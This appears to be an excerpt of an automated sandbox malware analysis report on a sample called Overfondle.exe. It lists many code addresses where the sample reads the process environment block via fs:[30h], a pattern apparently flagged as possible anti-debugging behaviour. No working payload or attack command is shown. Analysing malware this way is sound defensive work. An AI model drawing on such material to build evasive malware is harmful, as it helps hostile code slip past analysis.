        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2047E3F0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2048438F mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2045E388 mov eax, dword ptr fs:[00000030h] (3 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20458397 mov eax, dword ptr fs:[00000030h] (3 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2051A456 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h] (8 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2048245A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204EC460 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2048A470 mov eax, dword ptr fs:[00000030h] (3 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20498402 mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20498402 mov eax, dword ptr fs:[00000030h]8_2_20498402
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045C427 mov eax, dword ptr fs:[00000030h]8_2_2045C427
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045E420 mov eax, dword ptr fs:[00000030h]8_2_2045E420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045E420 mov eax, dword ptr fs:[00000030h]8_2_2045E420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045E420 mov eax, dword ptr fs:[00000030h]8_2_2045E420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h]8_2_204E6420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h]8_2_204E6420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h]8_2_204E6420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h]8_2_204E6420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h]8_2_204E6420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h]8_2_204E6420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h]8_2_204E6420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A430 mov eax, dword ptr fs:[00000030h]8_2_2049A430
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204604E5 mov ecx, dword ptr fs:[00000030h]8_2_204604E5
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2051A49A mov eax, dword ptr fs:[00000030h]8_2_2051A49A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204664AB mov eax, dword ptr fs:[00000030h]8_2_204664AB
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204944B0 mov ecx, dword ptr fs:[00000030h]8_2_204944B0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EA4B0 mov eax, dword ptr fs:[00000030h]8_2_204EA4B0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20468550 mov eax, dword ptr fs:[00000030h]8_2_20468550
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20468550 mov eax, dword ptr fs:[00000030h]8_2_20468550
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049656A mov eax, dword ptr fs:[00000030h]8_2_2049656A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049656A mov eax, dword ptr fs:[00000030h]8_2_2049656A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049656A mov eax, dword ptr fs:[00000030h]8_2_2049656A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F6500 mov eax, dword ptr fs:[00000030h]8_2_204F6500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534500 mov eax, dword ptr fs:[00000030h]8_2_20534500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534500 mov eax, dword ptr fs:[00000030h]8_2_20534500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534500 mov eax, dword ptr fs:[00000030h]8_2_20534500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534500 mov eax, dword ptr fs:[00000030h]8_2_20534500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534500 mov eax, dword ptr fs:[00000030h]8_2_20534500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534500 mov eax, dword ptr fs:[00000030h]8_2_20534500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534500 mov eax, dword ptr fs:[00000030h]8_2_20534500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470535 mov eax, dword ptr fs:[00000030h]8_2_20470535
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470535 mov eax, dword ptr fs:[00000030h]8_2_20470535
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470535 mov eax, dword ptr fs:[00000030h]8_2_20470535
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470535 mov eax, dword ptr fs:[00000030h]8_2_20470535
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470535 mov eax, dword ptr fs:[00000030h]8_2_20470535
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470535 mov eax, dword ptr fs:[00000030h]8_2_20470535
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E53E mov eax, dword ptr fs:[00000030h]8_2_2048E53E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E53E mov eax, dword ptr fs:[00000030h]8_2_2048E53E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E53E mov eax, dword ptr fs:[00000030h]8_2_2048E53E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E53E mov eax, dword ptr fs:[00000030h]8_2_2048E53E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E53E mov eax, dword ptr fs:[00000030h]8_2_2048E53E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E5CF mov eax, dword ptr fs:[00000030h]8_2_2049E5CF
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E5CF mov eax, dword ptr fs:[00000030h]8_2_2049E5CF
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204665D0 mov eax, dword ptr fs:[00000030h]8_2_204665D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A5D0 mov eax, dword ptr fs:[00000030h]8_2_2049A5D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A5D0 mov eax, dword ptr fs:[00000030h]8_2_2049A5D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C5ED mov eax, dword ptr fs:[00000030h]8_2_2049C5ED
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C5ED mov eax, dword ptr fs:[00000030h]8_2_2049C5ED
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204625E0 mov eax, dword ptr fs:[00000030h]8_2_204625E0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20494588 mov eax, dword ptr fs:[00000030h]8_2_20494588
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20462582 mov eax, dword ptr fs:[00000030h]8_2_20462582
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20462582 mov ecx, dword ptr fs:[00000030h]8_2_20462582
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E59C mov eax, dword ptr fs:[00000030h]8_2_2049E59C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E05A7 mov eax, dword ptr fs:[00000030h]8_2_204E05A7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E05A7 mov eax, dword ptr fs:[00000030h]8_2_204E05A7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E05A7 mov eax, dword ptr fs:[00000030h]8_2_204E05A7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204845B1 mov eax, dword ptr fs:[00000030h]8_2_204845B1
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204845B1 mov eax, dword ptr fs:[00000030h]8_2_204845B1
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047C640 mov eax, dword ptr fs:[00000030h]8_2_2047C640
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A660 mov eax, dword ptr fs:[00000030h]8_2_2049A660
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A660 mov eax, dword ptr fs:[00000030h]8_2_2049A660
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052866E mov eax, dword ptr fs:[00000030h]8_2_2052866E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052866E mov eax, dword ptr fs:[00000030h]8_2_2052866E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20492674 mov eax, dword ptr fs:[00000030h]8_2_20492674
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE609 mov eax, dword ptr fs:[00000030h]8_2_204DE609
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047260B mov eax, dword ptr fs:[00000030h]8_2_2047260B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047260B mov eax, dword ptr fs:[00000030h]8_2_2047260B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047260B mov eax, dword ptr fs:[00000030h]8_2_2047260B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047260B mov eax, dword ptr fs:[00000030h]8_2_2047260B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047260B mov eax, dword ptr fs:[00000030h]8_2_2047260B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047260B mov eax, dword ptr fs:[00000030h]8_2_2047260B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047260B mov eax, dword ptr fs:[00000030h]8_2_2047260B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2619 mov eax, dword ptr fs:[00000030h]8_2_204A2619
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047E627 mov eax, dword ptr fs:[00000030h]8_2_2047E627
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20496620 mov eax, dword ptr fs:[00000030h]8_2_20496620
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20498620 mov eax, dword ptr fs:[00000030h]8_2_20498620
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046262C mov eax, dword ptr fs:[00000030h]8_2_2046262C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A6C7 mov ebx, dword ptr fs:[00000030h]8_2_2049A6C7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A6C7 mov eax, dword ptr fs:[00000030h]8_2_2049A6C7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE6F2 mov eax, dword ptr fs:[00000030h]8_2_204DE6F2
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE6F2 mov eax, dword ptr fs:[00000030h]8_2_204DE6F2
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE6F2 mov eax, dword ptr fs:[00000030h]8_2_204DE6F2
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE6F2 mov eax, dword ptr fs:[00000030h]8_2_204DE6F2
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E06F1 mov eax, dword ptr fs:[00000030h]8_2_204E06F1
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E06F1 mov eax, dword ptr fs:[00000030h]8_2_204E06F1
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20464690 mov eax, dword ptr fs:[00000030h]8_2_20464690
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20464690 mov eax, dword ptr fs:[00000030h]8_2_20464690
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C6A6 mov eax, dword ptr fs:[00000030h]8_2_2049C6A6
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204966B0 mov eax, dword ptr fs:[00000030h]8_2_204966B0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049674D mov esi, dword ptr fs:[00000030h]8_2_2049674D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049674D mov eax, dword ptr fs:[00000030h]8_2_2049674D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049674D mov eax, dword ptr fs:[00000030h]8_2_2049674D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EE75D mov eax, dword ptr fs:[00000030h]8_2_204EE75D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20460750 mov eax, dword ptr fs:[00000030h]8_2_20460750
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2750 mov eax, dword ptr fs:[00000030h]8_2_204A2750
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2750 mov eax, dword ptr fs:[00000030h]8_2_204A2750
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E4755 mov eax, dword ptr fs:[00000030h]8_2_204E4755
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20468770 mov eax, dword ptr fs:[00000030h]8_2_20468770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C700 mov eax, dword ptr fs:[00000030h]8_2_2049C700
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20460710 mov eax, dword ptr fs:[00000030h]8_2_20460710
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20490710 mov eax, dword ptr fs:[00000030h]8_2_20490710
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C720 mov eax, dword ptr fs:[00000030h]8_2_2049C720
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C720 mov eax, dword ptr fs:[00000030h]8_2_2049C720
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049273C mov eax, dword ptr fs:[00000030h]8_2_2049273C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049273C mov ecx, dword ptr fs:[00000030h]8_2_2049273C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049273C mov eax, dword ptr fs:[00000030h]8_2_2049273C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DC730 mov eax, dword ptr fs:[00000030h]8_2_204DC730
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046C7C0 mov eax, dword ptr fs:[00000030h]8_2_2046C7C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E07C3 mov eax, dword ptr fs:[00000030h]8_2_204E07C3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204827ED mov eax, dword ptr fs:[00000030h]8_2_204827ED
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204827ED mov eax, dword ptr fs:[00000030h]8_2_204827ED
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204827ED mov eax, dword ptr fs:[00000030h]8_2_204827ED
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EE7E1 mov eax, dword ptr fs:[00000030h]8_2_204EE7E1
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204647FB mov eax, dword ptr fs:[00000030h]8_2_204647FB
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204647FB mov eax, dword ptr fs:[00000030h]8_2_204647FB
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050678E mov eax, dword ptr fs:[00000030h]8_2_2050678E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204607AF mov eax, dword ptr fs:[00000030h]8_2_204607AF
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205147A0 mov eax, dword ptr fs:[00000030h]8_2_205147A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20472840 mov ecx, dword ptr fs:[00000030h]8_2_20472840
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20490854 mov eax, dword ptr fs:[00000030h]8_2_20490854
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20464859 mov eax, dword ptr fs:[00000030h]8_2_20464859
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20464859 mov eax, dword ptr fs:[00000030h]8_2_20464859
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EE872 mov eax, dword ptr fs:[00000030h]8_2_204EE872
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EE872 mov eax, dword ptr fs:[00000030h]8_2_204EE872
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F6870 mov eax, dword ptr fs:[00000030h]8_2_204F6870
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F6870 mov eax, dword ptr fs:[00000030h]8_2_204F6870
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EC810 mov eax, dword ptr fs:[00000030h]8_2_204EC810
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050483A mov eax, dword ptr fs:[00000030h]8_2_2050483A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050483A mov eax, dword ptr fs:[00000030h]8_2_2050483A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A830 mov eax, dword ptr fs:[00000030h]8_2_2049A830
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20482835 mov eax, dword ptr fs:[00000030h]8_2_20482835
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20482835 mov eax, dword ptr fs:[00000030h]8_2_20482835
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20482835 mov eax, dword ptr fs:[00000030h]8_2_20482835
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20482835 mov ecx, dword ptr fs:[00000030h]8_2_20482835
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20482835 mov eax, dword ptr fs:[00000030h]8_2_20482835
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20482835 mov eax, dword ptr fs:[00000030h]8_2_20482835
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E8C0 mov eax, dword ptr fs:[00000030h]8_2_2048E8C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205308C0 mov eax, dword ptr fs:[00000030h]8_2_205308C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C8F9 mov eax, dword ptr fs:[00000030h]8_2_2049C8F9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C8F9 mov eax, dword ptr fs:[00000030h]8_2_2049C8F9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052A8E4 mov eax, dword ptr fs:[00000030h]8_2_2052A8E4
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20460887 mov eax, dword ptr fs:[00000030h]8_2_20460887
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EC89D mov eax, dword ptr fs:[00000030h]8_2_204EC89D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E0946 mov eax, dword ptr fs:[00000030h]8_2_204E0946
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534940 mov eax, dword ptr fs:[00000030h]8_2_20534940
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A096E mov eax, dword ptr fs:[00000030h]8_2_204A096E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A096E mov edx, dword ptr fs:[00000030h]8_2_204A096E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A096E mov eax, dword ptr fs:[00000030h]8_2_204A096E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20504978 mov eax, dword ptr fs:[00000030h]8_2_20504978
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20504978 mov eax, dword ptr fs:[00000030h]8_2_20504978
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20486962 mov eax, dword ptr fs:[00000030h]8_2_20486962
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20486962 mov eax, dword ptr fs:[00000030h]8_2_20486962
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20486962 mov eax, dword ptr fs:[00000030h]8_2_20486962
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EC97C mov eax, dword ptr fs:[00000030h]8_2_204EC97C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE908 mov eax, dword ptr fs:[00000030h]8_2_204DE908
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE908 mov eax, dword ptr fs:[00000030h]8_2_204DE908
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EC912 mov eax, dword ptr fs:[00000030h]8_2_204EC912
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20458918 mov eax, dword ptr fs:[00000030h]8_2_20458918
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20458918 mov eax, dword ptr fs:[00000030h]8_2_20458918
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E892A mov eax, dword ptr fs:[00000030h]8_2_204E892A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F892B mov eax, dword ptr fs:[00000030h]8_2_204F892B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052A9D3 mov eax, dword ptr fs:[00000030h]8_2_2052A9D3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F69C0 mov eax, dword ptr fs:[00000030h]8_2_204F69C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h]8_2_2046A9D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h]8_2_2046A9D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h]8_2_2046A9D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h]8_2_2046A9D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h]8_2_2046A9D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h]8_2_2046A9D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204949D0 mov eax, dword ptr fs:[00000030h]8_2_204949D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EE9E0 mov eax, dword ptr fs:[00000030h]8_2_204EE9E0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204929F9 mov eax, dword ptr fs:[00000030h]8_2_204929F9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204929F9 mov eax, dword ptr fs:[00000030h]8_2_204929F9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
